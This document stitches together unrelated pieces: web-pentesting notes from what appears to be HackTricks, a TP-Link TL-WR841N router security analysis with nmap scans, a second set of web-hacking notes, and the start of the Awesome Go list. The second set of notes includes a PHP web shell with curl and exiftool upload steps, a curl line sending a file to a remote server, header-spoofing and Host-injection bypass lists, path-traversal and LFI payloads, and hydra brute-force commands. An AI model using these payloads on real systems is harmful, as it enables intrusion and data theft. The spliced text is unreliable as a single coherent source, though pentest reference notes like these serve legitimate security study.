* **JsFuck deobfuscation** \(javascript with chars:"\[\]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/)\)
* \*\*\*\*[**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
* In several occasions you will need to **understand regular expressions** used, this will be useful: [https://regex101.com/](https://regex101.com/)
* You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.
#### 403 Forbidden/Basic Authentication/401 Unauthorized \(bypass\)
{% page-ref page="403-and-401-bypasses.md" %}
#### 502 Proxy Error
If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** \(with the host header and other common headers\), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.
#### **NTLM Authentication - Info disclosure**
If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** \(and asking for **domain** **name**\), you can provoke an **information disclosure**.
**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info \(IIS version, Windows version...\) inside the header "WWW-Authenticate".
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
#### HTTP Redirect \(CTF\)
It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** \(as the browser will execute the redirection\) but something could be **hidden** in there.
## Web Vulnerabilities Checking
Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:
{% page-ref page="../../pentesting-web/web-vulnerabilities-methodology.md" %}
TODO: Complete the list of vulnerabilities and techniques with [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) and [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html), [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
## HackTricks Automatic Commands
```text
Protocol_Name: Web #Protocol Abbreviation if there is one.
Port_Number: 80,443 #Comma separated if there is more than one.
Protocol_Description: Web #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for Web
Note: |
https://book.hacktricks.xyz/pentesting/pentesting-web
Entry_2:
Name: Quick Web Scan
Description: Nikto and GoBuster
Command: nikto -host {Web_Proto}://{IP}:{Web_Port} &&&& gobuster dir -w {Small_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} && gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}
Entry_3:
Name: Nikto
Description: Basic Site Info via Nikto
Command: nikto -host {Web_Proto}://{IP}:{Web_Port}
Entry_4:
Name: WhatWeb
Description: General purpose auto scanner
Command: whatweb -a 4 {IP}
Entry_5:
Name: Directory Brute Force Non-Recursive
Description: Non-Recursive Directory Brute Force
Command: gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}
Entry_6:
Name: Directory Brute Force Recursive
Description: Recursive Directory Brute Force
Command: python3 {Tool_Dir}dirsearch/dirsearch.py -w {Small_Dirlist} -e php,exe,sh,py,html,pl -f -t 20 -u {Web_Proto}://{IP}:{Web_Port} -r 10
Entry_7:
Name: Directory Brute Force CGI
Description: Common Gateway Interface Brute Force
Command: gobuster dir -u {Web_Proto}://{IP}:{Web_Port}/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s 200
Entry_8:
Name: Nmap Web Vuln Scan
Description: Tailored Nmap Scan for web Vulnerabilities
Command: nmap -vv --reason -Pn -sV -p {Web_Port} --script=`banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)` {IP}
Entry_9:
Name: Drupal
Description: Drupal Enumeration Notes
Note: |
git clone https://github.com/immunIT/drupwn.git for low hanging fruit and git clone https://github.com/droope/droopescan.git for deeper enumeration
Entry_10:
Name: WordPress
Description: WordPress Enumeration with WPScan
Command: |
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
Entry_11:
Name: WordPress Hydra Brute Force
Description: Need User (admin is default)
Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```
|
# TP Link TL-WR841N router cybersecurity analysis
Cyber security analysis of TP Link TL-WR841N router.
Github Pages version of this analysis can be found by [following this link](https://kostasereksonas.github.io/tp-link-tl-wr841n-security-analysis/)
Table of Contents
=================
* [TP Link TL-WR841N router cybersecurity analysis](#TP-Link-TL-WR841N-router-cybersecurity-analysis)
* [Plan of Analysis](#Plan-of-Analysis)
* [Technical Information](#Technical-Information)
* [Open Ports](#Open-Ports)
* [TCP Port Scan](#TCP-Port-Scan)
* [UDP Port Scan](#UDP-Port-Scan)
* [OS Detection](#OS-Detection)
* [Written Exploits](#Written-Exploits)
* [Authentication Bypass Exploit](#Authentication-Bypass-Exploit)
* [Command Injection Exploit](#Command-Injection-Exploit)
# Plan of Analysis
The plan of TP Link TL-WR841N router cybersecurity analysis is as follows:
1. Gather of technical and network information about the router.
2. Intercept and analyze network traffic of the router.
3. Find firmware and a list of software installed within the router.
4. Check CVE lists for published known exploits found within the router's software and check their severity score.
5. Investigate found exploits and try a practical exploitation of these vulnerabilities on a given TP Link TL-WR841N router (i.e. found or custom made scripts for exploiting a certain vulnerability) for getting a better understanding of potential risks that found vulnerabilities pose.
6. Research the possible ways of mitigation for the given the risks.
7. Give conclusions of the analysis.
8. Research the possibility of using `OpenWRT` as the router's firmware.
# Technical Information
In this section I will present the technical and network information that I have gathered about tested TP Link TP-WR841N router. This section includes information about:
1. Finding open TCP ports.
2. Finding open UDP ports.
3. Detection of the Operating System (OS) within the TP Link TL-WR841M router.
4. Detection of the version of the OS that is running within the TP Link TL-WR841M router.
## Open Ports
In this subsection of Technical information gathering section I am presenting the results of a ***port scan*** that I have done on the tested router. For all the further scans `nmap` tool was used.
### TCP Port Scan
As mentioned before, for finding open TCP ports and services that are running on top of them, `nmap` tool was used. The command for this specific scan was `nmap -v -sS -sV -sC -p- X.X.X.X`, where `X.X.X.X` is IP address of the TP Link router. Short description of every used flag is presented below:
```
-v Verbosity. Gives more information about what the scan is doing.
-sS Stealth scan. Fast, accurate and non-intrusive test of a selected target.
-sV Version scan. Used to detect versions of services running on specific open ports of IP Camera.
-sC Scripts scan. Uses a default set of most common `nmap` scripts.
-p- Check all 65535 TCP ports for if they are open.
```
Results of this scan are presented below:
```
PORT STATE SERVICE VERSION
22/tcp open ssh Dropbear sshd 2012.55 (protocol 2.0)
| ssh-hostkey:
| 1024 2d:20:4b:ed:24:f6:13:5d:32:af:44:88:35:5b:04:de (DSA)
|_ 1040 df:61:f7:f5:bc:aa:e6:9a:2d:6a:20:cc:98:38:68:38 (RSA)
80/tcp open http TP-LINK WR841N WAP http config
|_http-title: TL-WR841N
1900/tcp open upnp ipOS upnpd (TP-LINK TL-WR841N WAP 11.0; UPnP 1.0)
49152/tcp open http Huawei HG8245T modem http config
|_http-title: Site doesn't have a title.
```
Nmap scan found ***4*** TCP ports whose numbers are `22`, `80`, `1900` and `49152`. Some details about each port are presented below:
1. Port `22` is a standart port for `ssh` service and on top of this port ***Dropbear sshd 2012.55*** service is running. Also a couple of ssh hostkeys were discovered.
2. Port `80` is a standard `http` port and is controlled by ***TP-LINK WR841N WAP http config*** software.
3. Port `1900` is an `upnp` or ***universal plug and play*** port and is controlled by ***ipOS upnpd*** service.
4. Port `49152` is a port for ***alternate http service*** and is controlled by ***Huawei HG8245T modem http config*** service. It looks like a different built-in module within the router for connecting to some kind of http services.
### UDP Port Scan
After finding TCP ports I have conducted a search for ***UDP*** ports. Same `nmap` tool was used, although this time `-sU` flag for ***UDP scan*** was used insead of TCP stealth scan (-sS). The full command for this scan was `nmap -v -sU -sV X.X.X.X`, where `X.X.X.X` is IP address for the TP Link router. Results for this scan are presented below:
```
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.10.3-P4 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Debian
|_dns-recursion: Recursion appears to be enabled
67/udp open|filtered dhcps
1900/udp open|filtered upnp
```
Nmap scan found ***3*** open UDP ports with numbers `53`, `67` and `1900`. Some details about each port are presented below:
1. Port `53` has a `domain` service controlled by ***ISC BIND 9.10.3-P4*** and it is used for some DNS related stuff. Also ***DNS recursion*** seems to be enabled. Further reading needs to be done to fully understand what it is used for and what could potential risks of this service be.
2. Port `67` is controlled by `dhcps` or ***Dynamic Host Configuration Protocol*** service and could be used for automatic IP network configuration.
3. Port `1900` is used for `upnp` or ***universal plug and play*** service, same as it's TCP counterpart.
## OS Detection
To determine type and version of the OS installed within the TP Link router, `nmap` tool with `-O` flag was used. The full command was `nmap -v -sS -sV -O X.X.X.X`, where X.X.X.X is an IP address of TP Link router. The results of this scan are presented below:
```
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS deta Linux 2.6.17 - 2.6.36
```
The router is recognized as a `general purpose` device and it is running a `Linux 2.6` operating system with likely version ranging from `2.6.17` to `2.6.36`.
# Written Exploits
In this section I will present an in-depth analysis of couple exploits for TP LINK TL-WR841N router that I have found in [exploit-db page](https://www.exploit-db.com/). These exploits are:
1. [Authenticaton Bypass Exploit](https://www.exploit-db.com/exploits/44781).
2. [Command Injection Exploit](https://www.exploit-db.com/exploits/50058).
I will start with ***Authentication Bypass Exploit*** and later go to analyze ***Command Injection Exploit***.
## Authentication Bypass Exploit
This exploit, found on [Exploit-db](https://www.exploit-db.com/exploits/44781) was written by BlackFog team at [SecureLayer7.net](https://www.SecureLayer7.net/). If the Referer Header is set as `http://192.168.0.1/mainFrame.htm`, then no authentication is needed for following commands. Although, this exploit did not work for my router.
![Failed Auth Bypass](/images/Failed_Auth_Bypass.png)
## Command Injection Exploit
For now I have tried to run the Python script found in the Exploit-db link but it did not work.
![Failed Injection](/images/Failed_Injection.png)
# Code analysis
In this section I will analyze the [Index page source code](/scripts/login.js) and [linked encryption file](/scripts/encrypt.js) javascript code files.
|
---
description: >-
TODO: Need to pull web notes out of the OS Agnostic section (and then rename
that to something better!)
---
# Web Notes
{% hint style="success" %}
Hack Responsibly.
Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.  
{% endhint %}
## Checklist
* [ ] View SSL certificates for domains, emails, usernames
* [ ] View source code 
* [ ] Check `/robots.txt`, `.htaccess`, `.htpasswd`
* [ ] Check HTTP Request/Response headers
* [ ] Check for files/directories with `gobuster`/`dirbuster`
* [ ] Check for virtual hosts/subdomains
* [ ] View console
* [ ] Use `nikto`
* [ ] Check HTTP OPTIONS
* [ ] HTTP PUT / POST File upload 
* [ ] Parameter fuzzing with `ffuf`
* [ ] Browser vs. Burp response
* [ ] Shell shock (`cgi-bin/status`)
* [ ] Make wordlist with `cewl` and directory/login brute force
* [ ] `nmap --script http-enum 10.10.10.10`
* [ ] Apache version exploit & other base server exploits
## HTTP Response Codes
```bash
#Informational Response Codes (1xx)
100 - Continue
101 - Switching Protocols
102 - Processing
#Success Response Codes (2xx)
200 - OK 206 - Partial Content
201 - Created 207 - Multi-status
202 - Accepted 208 - Already Reported
203 - Non-authoritative Info 226 - IM Used
204 - No Content 250 - Low Storage Space
205 - Reset Content
#Redirection Response Codes (3xx)
300 - Multiple Choices 304 - Not Modified
301 - Moved Permanently 305 - Use Proxy
302 - Found 307 - Temporary Redirect
303 - See Other 308 - Permanent Redirect
#Client Error Response Codes (4xx)
400 - Multiple Choices 410 - Not Modified
401 - Moved Permanently 411 - Use Proxy
402 - Found 412 - Temporary Redirect
403 - See Other 413 - Permanent Redirect
404 - Multiple Choices 414 - Not Modified
405 - Moved Permanently 415 - Use Proxy
406 - Found 416 - Temporary Redirect
407 - See Other 417 - Permanent Redirect
408 - Found 418 - Temporary Redirect
409 - See Other
#Server Error Response Codes (5xx)
500 - Internal Server Error 508 - Loop Detected
501 - Not Implemented 509 - Bandwidth Limited
502 - Bad Gateway 510 - Not Extended
503 - Service Unavailable 511 - Network Auth Requried
504 - Gateway Timeout 550 - Permission Denied
505 - HTTP Ver Not Supported 551 - Option Not Supported
506 - Variant Also Negotiates 598 - Nework Read Timeout Error
507 - Insufficient Storage 599 - Network Connect Timeout Error
```
## Headers
### HTTP Authorization headers
```bash
# Basic Auth (Base64)
Authorization: Basic AXVubzpwQDU1dzByYM==
# Bearer Token (JWT)
Authorization: Bearer <token>
# API Key
GET /endpoint?api_key=abcdefgh123456789
X-API-Key: abcdefgh123456789
# Digest Auth
Authorization: Digest username=”admin” Realm=”abcxyz” nonce=”474754847743646”, uri=”/uri” response=”7cffhfr54685gnnfgerg8”
# OAuth2.0
Authorization: Bearer hY_9.B5f-4.1BfE
# Hawk Authentication
Authorization: Hawk id="abcxyz123", ts="1592459563", nonce="gWqbkw", mac="vxBCccCutXGV30gwEDKu1NDXSeqwfq7Z0sg/HP1HjOU="
# AWS signature
Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aws4_
```
### HTTP Security Headers
1. [X-Frame-Options](https://www.netsparker.com/whitepaper-http-security-headers/#XFrameOptionsHTTPHeader)
2. [X-XSS-Protection](https://www.netsparker.com/whitepaper-http-security-headers/#XXSSProtectionHTTPHeader)
3. [X-Content-Type-Options](https://www.netsparker.com/whitepaper-http-security-headers/#XContentTypeOptionsHTTPHeader)
4. [X-Download-Options](https://www.netsparker.com/whitepaper-http-security-headers/#XDownloadOptionsHTTPHeader)
5. [Content Security Policy (CSP)](https://www.netsparker.com/whitepaper-http-security-headers/#ContentSecurityPolicyHTTPHeader)
6. [HTTP Strict Transport Security (HSTS)](https://www.netsparker.com/whitepaper-http-security-headers/#HTTPStrictTransportSecurityHSTSHTTPHeader)
7. [HTTP Public Key Pinning](https://www.netsparker.com/whitepaper-http-security-headers/#HTTPPublicKeyPinning)
8. [Expect-CT](https://www.netsparker.com/whitepaper-http-security-headers/#ExpectCTHTTPHeader)
9. [Referrer-Policy](https://www.netsparker.com/whitepaper-http-security-headers/#ReferrerPolicyHTTPHeader)
* [https://www.netsparker.com/whitepaper-http-security-headers/](https://www.netsparker.com/whitepaper-http-security-headers/)
* [https://owasp.org/www-project-secure-headers/](https://owasp.org/www-project-secure-headers/)
### Header Bypass Methods
```bash
# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
Client-IP:
Connection:
Contact:
Forwarded:
From:
Host:
Origin:
Referer:
True-Client-IP:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Server:
X-Host:
X-Original-URL:
X-Originating-IP:
X-Real-IP:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-Wap-Profile:
# Try to repeat same Host header 2 times
Host: legit.com
Stuff: stuff
Host: evil.com
# Bypass type limit
Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'
# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
# 401/403 bypasses
# Whitelisted IP 127.0.0.1 or localhost
Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1
# Fake Origin - make GET request to accesible endpoint with:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Referer: /admin
# Also try with absolute url https:/domain.com/admin
# Method Override
X-HTTP-Method-Override: PUT
# Provide full path GET
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
# Add line wrapping
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
```
## Cookies
* [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
* "Largest Database of Pre-Categorized Cookies"
* Scans a website for cookie usage
### JavaScript
```bash
# can pair with alert();
document.cookie;
```
### Ruby
```ruby
# Use HTTP::Cookie library <https://github.com/sparklemotion/http-cookie>
# Following examples were taken from the readme.md from above repository
## One cookie
cookie = HTTP::Cookie.new("uid", "u12345", domain: 'example.org',
for_domain: true,
path: '/',
max_age: 7 * 86400)
header['Set-Cookie'] = cookie.set_cookie_value
## Several cookies
jar = HTTP::CookieJar.new
jar.load(filename) if File.exist?(filename)
header["Set-Cookie"].each { |value| jar.parse(value, uri) }
header["Cookie"] = HTTP::Cookie.cookie_value(jar.cookies(uri))
```
### Python2
```bash
# python has a cookie library!
# Following example taken from the python documentation
import cookielib, urllib2
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
r = opener.open("http://example.com/")
```
### Edit cookies in chrome
Settings -> Advanced Settings -> Privacy -> Content -> Cookies
or "Edit This Cookie" plugin
### Edit cookies in firefox
Preferences -> Privacy -> Show Cookies
or "Cookies Manager+" addon
## Local File Inclusion (LFI) / Remote File Inclusion (RFI)
Common and/or useful files to check for when exploiting Local File Inclusion (for both Linux and Windows): [https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI)
### LFI - Retrieve HTML/PHP files without executing
```
https://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
```
## File Upload
**HTTP PUT**
```bash
nmap -p 80 $ip --script http-put --script-args http-put.url='/home/zweilos/php-reverse-shell.php',http-put.file='rev.php'
curl -X PUT -d '<?php system($_GET["cmd"]);?>' http://$ip/rev.php
```
**Cadaver**
```
cadaver http://10.10.10.10/dav/put /tmp/shell.php
```
**JPG to PNG shell**
```php
<?php system($_GET['cmd']); ?> //rev.php
exiftool "-comment<=rev.php" malicious.png
```
**Upload Files through POST**
```bash
# POST file
curl -X POST -F "file=@/file/location/rev.php" http://$ip/upload.php --cookie "cookie"
# POST binary data to web form
curl -F "field=<rev.zip" http://$ip/upload.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
```
## OpenVAS Vulnerability Scanner
```bash
#Install openvas
apt update
apt install openvas
#Run the setup script
openvas-setup
#Check that it is running on port 939
netstat -tulpn
#Login by using a browser and navigating to: https://127.0.0.1:939
```
## Misc
### IPv6
primer: [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo)
```
fe80::/10 - febf:ffff:ffff:ffff:ffff:ffff:ffff:ffff Unique Link Local 169.254.x.x APIPA
(built from MAC address on Linux, 7th bit flips, adds ff:fe in the center)
fc00::/7 - fdff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Unique Local Unicast 10.x.x.x, 172.16.x.x, 192.168.x.x
2000::/3 - Global Unicast routable
ff02::1 - Multicast All Nodes
ff02::2 Multicast ROUTER nodes
```
ip6tables - iptables for ipv6
### HTTP Authentication Types
```bash
Digest Authentication (uses htdigest)
-->susceptible to MITM attack!
Integrated Windows Authentication
-->will not function over proxy
Form-Based Authentication
-->not inherently encrypted, often poor implimentation
```
### XPATH Dump
```
https://example.com/accounts.php?user=test"]/../*%00&xpath_debug=1
```
whatismybrowser.com - research User-Agent strings
Use `curl` to exfiltrate file on remote server (from attackers box): `curl -d @/<file> <remote server>`
in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)
vulnerability testing for webdav (or other file upload vulns!): `davtest`
bypassing filetype filters with http MOVE command to rename allowed filetype [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)
Wordpress enumeration: `wpscan -u <url> [--disable-tls-checks]`
pull Google cached webpage if regular site not loading: `cache:https://<somewebsite>`
Virtual Host Routing: substitute IP for hostname to get different results
hydra against http wordpress login walkthrough: [IppSec:HacktheBox - Apocalyst](https://www.youtube.com/watch?v=TJVghYBByIA)
web application fuzzer: [wfuzz](https://github.com/xmendez/wfuzz)
Web site "flyover" surveillance: [Aquatone](https://github.com/michenriksen/aquatone) "is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface" - from the author (see link). Visual dirbuster?
### Crawl web pages for keywords - useful for password/vhost enumeration lists
```bash
# To spider a site and write all found words to a file
cewl -w <file> <url>
# To spider a site and follow links to other sites
cewl -o <url>
# To spider a site using a given user-agent
cewl -u <user-agent> <url>
# To spider a site for a given depth and minimum word length
cewl -d <depth> -m <min word length> <url>
# To spider a site and include a count for each word
cewl -c <url>
# To spider a site inluding meta data and separate the meta_data words
cewl -a -meta_file <file> <url>
# To spider a site and store email adresses in a separate file
cewl -e -email_file <file> <url>
```
### Common checks
```bash
# robots.txt
curl http://example.com/robots.txt
# headers
wget --save-headers http://www.example.com/
# Strict-Transport-Security (HSTS)
# X-Frame-Options: SAMEORIGIN
# X-XSS-Protection: 1; mode=block
# X-Content-Type-Options: nosniff
# Cookies
# Check Secure and HttpOnly flag in session cookie
# If you find a BIG-IP cookie, app is behind a load balancer
# SSL Ciphers
nmap --script ssl-enum-ciphers -p 443 www.example.com
# HTTP Methods
nmap -p 443 --script http-methods www.example.com
# Cross Domain Policy
curl http://example.com/crossdomain.xml
# allow-access-from domain="*"
```
### IP conversion
Injecting IPs when '**`.`**' is disallowed: convert the standard "dotted decimal" format to decimal, or hex value using -[ip2dh](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py). The sending or receiving computer will usually automatically convert it to a format that it can use. This is a great way to bypass WAF, IDS, or other tools that filter on IPs.
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
|
# Awesome Go
<a href="https://awesome-go.com/"><img align="right" src="https://github.com/avelino/awesome-go/raw/main/tmpl/assets/logo.png" alt="awesome-go" title="awesome-go" /></a>
[![Build Status](https://github.com/avelino/awesome-go/actions/workflows/tests.yaml/badge.svg?branch=main)](https://github.com/avelino/awesome-go/actions/workflows/tests.yaml?query=branch%3Amain)
[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)
[![Slack Widget](https://img.shields.io/badge/join-us%20on%20slack-gray.svg?longCache=true&logo=slack&colorB=red)](https://gophers.slack.com/messages/awesome)
[![Netlify Status](https://api.netlify.com/api/v1/badges/83a6dcbe-0da6-433e-b586-f68109286bd5/deploy-status)](https://app.netlify.com/sites/awesome-go/deploys)
[![Track Awesome List](https://www.trackawesomelist.com/badge.svg)](https://www.trackawesomelist.com/avelino/awesome-go/)
We use the _[Golang Bridge](https://github.com/gobridge/about-us/blob/master/README.md)_ community Slack for instant communication, follow the [form here to join](https://invite.slack.golangbridge.org/).
<a href="https://www.producthunt.com/posts/awesome-go?utm_source=badge-featured&utm_medium=badge&utm_souce=badge-awesome-go" target="_blank"><img src="https://api.producthunt.com/widgets/embed-image/v1/featured.svg?post_id=291535&theme=light" alt="awesome-go - Curated list awesome Go frameworks, libraries and software | Product Hunt" style="width: 250px; height: 54px;" width="250" height="54" /></a>
**Sponsorships:**
_Special thanks to_
<div align="center">
<table cellpadding="5">
<tbody align="center">
<tr>
<td>
<a href="https://bit.ly/awesome-go-workos">
<img src="https://avelino.run/sponsors/workos-logo-white-bg.svg" width="200" alt="WorkOS"><br/>
<b>Your app, enterprise-ready.</b><br/>
<sub>Start selling to enterprise customers with just a few lines of code.</sub><br/>
<sup>Add Single Sign-On (and more) in minutes instead of months.</sup>
</a>
</td>
<td>
<a href="https://bit.ly/awesome-go-keygen">
<img src="https://avelino.run/sponsors/keygen-logo.png" width="200" alt="keygen"><br/>
<b>An open, source-available software licensing and distribution API.</b><br/>
<sub>Securely license and distribute Go applications with a single API.</sub><br>
<sup>Add auto updates with only a few lines of code.</sup>
</a>
</td>
</tr>
<tr>
<td colspan="2">
<a href="https://bit.ly/awesome-go-digitalocean">
<img src="https://avelino.run/sponsors/do_logo_horizontal_blue-210.png" width="200" alt="Digital Ocean">
</a>
</td>
</tr>
</tbody>
</table>
</div>
**Awesome Go has no monthly fee**_, but we have employees who **work hard** to keep it running. With money raised, we can repay the effort of each person involved! You can see how we calculate our billing and distribution as it is open to the entire community. Want to be a supporter of the project click [here](mailto:avelinorun+oss@gmail.com?subject=awesome-go%3A%20project%20support)._
> A curated list of awesome Go frameworks, libraries, and software. Inspired by [awesome-python](https://github.com/vinta/awesome-python).
**Contributing:**
Please take a quick gander at the [contribution guidelines](https://github.com/avelino/awesome-go/blob/main/CONTRIBUTING.md) first. Thanks to all [contributors](https://github.com/avelino/awesome-go/graphs/contributors); you rock!
> _If you see a package or project here that is no longer maintained or is not a good fit, please submit a pull request to improve this file. Thank you!_
## Contents
- [Awesome Go](#awesome-go)
- [Contents](#contents)
- [Audio and Music](#audio-and-music)
- [Authentication and OAuth](#authentication-and-oauth)
- [Blockchain](#blockchain)
- [Bot Building](#bot-building)
- [Build Automation](#build-automation)
- [Command Line](#command-line)
- [Advanced Console UIs](#advanced-console-uis)
- [Standard CLI](#standard-cli)
- [Configuration](#configuration)
- [Continuous Integration](#continuous-integration)
- [CSS Preprocessors](#css-preprocessors)
- [Data Structures and Algorithms](#data-structures-and-algorithms)
- [Bit-packing and Compression](#bit-packing-and-compression)
- [Bit Sets](#bit-sets)
- [Bloom and Cuckoo Filters](#bloom-and-cuckoo-filters)
- [Data Structure and Algorithm Collections](#data-structure-and-algorithm-collections)
- [Iterators](#iterators)
- [Maps](#maps)
- [Miscellaneous Data Structures and Algorithms](#miscellaneous-data-structures-and-algorithms)
- [Nullable Types](#nullable-types)
- [Queues](#queues)
- [Sets](#sets)
- [Text Analysis](#text-analysis)
- [Trees](#trees)
- [Pipes](#pipes)
- [Database](#database)
- [Caches](#caches)
- [Databases Implemented in Go](#databases-implemented-in-go)
- [Database Schema Migration](#database-schema-migration)
- [Database Tools](#database-tools)
- [SQL Query Builders](#sql-query-builders)
- [Database Drivers](#database-drivers)
- [Interfaces to Multiple Backends](#interfaces-to-multiple-backends)
- [Relational Database Drivers](#relational-database-drivers)
- [NoSQL Database Drivers](#nosql-database-drivers)
- [Search and Analytic Databases](#search-and-analytic-databases)
- [Date and Time](#date-and-time)
- [Distributed Systems](#distributed-systems)
- [Dynamic DNS](#dynamic-dns)
- [Email](#email)
- [Embeddable Scripting Languages](#embeddable-scripting-languages)
- [Error Handling](#error-handling)
- [File Handling](#file-handling)
- [Financial](#financial)
- [Forms](#forms)
- [Functional](#functional)
- [Game Development](#game-development)
- [Generators](#generators)
- [Geographic](#geographic)
- [Go Compilers](#go-compilers)
- [Goroutines](#goroutines)
- [GUI](#gui)
- [Hardware](#hardware)
- [Images](#images)
- [IoT (Internet of Things)](#iot-internet-of-things)
- [Job Scheduler](#job-scheduler)
- [JSON](#json)
- [Logging](#logging)
- [Machine Learning](#machine-learning)
- [Messaging](#messaging)
- [Microsoft Office](#microsoft-office)
- [Microsoft Excel](#microsoft-excel)
- [Miscellaneous](#miscellaneous)
- [Dependency Injection](#dependency-injection)
- [Project Layout](#project-layout)
- [Strings](#strings)
- [Uncategorized](#uncategorized)
- [Natural Language Processing](#natural-language-processing)
- [Language Detection](#language-detection)
- [Morphological Analyzers](#morphological-analyzers)
- [Slugifiers](#slugifiers)
- [Tokenizers](#tokenizers)
- [Translation](#translation)
- [Transliteration](#transliteration)
- [Networking](#networking)
- [HTTP Clients](#http-clients)
- [OpenGL](#opengl)
- [ORM](#orm)
- [Package Management](#package-management)
- [Performance](#performance)
- [Query Language](#query-language)
- [Resource Embedding](#resource-embedding)
- [Science and Data Analysis](#science-and-data-analysis)
- [Security](#security)
- [Serialization](#serialization)
- [Server Applications](#server-applications)
- [Stream Processing](#stream-processing)
- [Template Engines](#template-engines)
- [Testing](#testing)
- [Text Processing](#text-processing)
- [Formatters](#formatters)
- [Markup Languages](#markup-languages)
- [Parsers/Encoders/Decoders](#parsersencodersdecoders)
- [Regular Expressions](#regular-expressions)
- [Sanitation](#sanitation)
- [Scrapers](#scrapers)
- [RSS](#rss)
- [Utility/Miscellaneous](#utilitymiscellaneous)
- [Third-party APIs](#third-party-apis)
- [Utilities](#utilities)
- [UUID](#uuid)
- [Validation](#validation)
- [Version Control](#version-control)
- [Video](#video)
- [Web Frameworks](#web-frameworks)
- [Middlewares](#middlewares)
- [Actual middlewares](#actual-middlewares)
- [Libraries for creating HTTP middlewares](#libraries-for-creating-http-middlewares)
- [Routers](#routers)
